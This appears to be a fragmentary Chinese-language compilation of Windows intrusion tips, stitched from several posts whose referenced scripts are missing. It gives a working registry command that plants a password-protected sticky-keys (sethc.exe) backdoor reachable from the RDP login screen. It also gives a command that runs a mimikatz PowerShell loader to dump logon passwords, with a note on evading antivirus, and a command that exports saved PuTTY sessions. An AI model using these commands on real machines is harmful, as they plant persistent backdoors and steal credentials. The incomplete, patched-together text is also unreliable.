Windows

简单示例，多线程处理多个客户端

使用方法

1,    保存下面脚本为batchPing.ps1

2,    执行命令

powershell -ep bypass ./batchPing.ps1 -ipStr 192.168.1-2.1-254 -outFile c:\out.txt

  入侵测试过程中，有时会扫到3389，蛮按按shift 放大镜，跳出来别人的后门，直接秒杀了。

  当然我们希望避免这种情况，所以可以给后门加个简单的密码，防止被“蹭饭”

  reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd /S /C @echo off && set /p Password= &&for /f \"delims== tokens=2\" %i in ('set Password') do if %i==ThisIsPassword start cmd" /f

  ThisIsPassword就是自己设置的密码，按下后弹出框框，只有密码输对了才会继续弹出cmd

主要特点

  1,Powershell是白名单程序，可以稳定执行

  2,mimikatz的二进制内容的字符串可以以文件，网络等方式存在，方便嵌套调用和免杀

使用方法

powershell -ep bypass ./fk.ps1 privilege::debug sekurlsa::logonpasswords exit

对于当前用户，Putty会话保存在HKCU\Software\SimonTatham\PuTTY\Sessions下，可以直接用

    reg export HKCU\Software\SimonTatham\PuTTY\Sessions c:\programdata\endpoint\putty.reg

进行导出查看

如果想要获得本机所有用户的，则可以使用以下powershell脚本批量获取（管理员权限）。

Powershell 使用 System.Data.SqlClient.SqlConnection 连接和查询数据库

主要过程

1，连接数据库

2，执行查询

3，返回结果并输出

简要代码如下，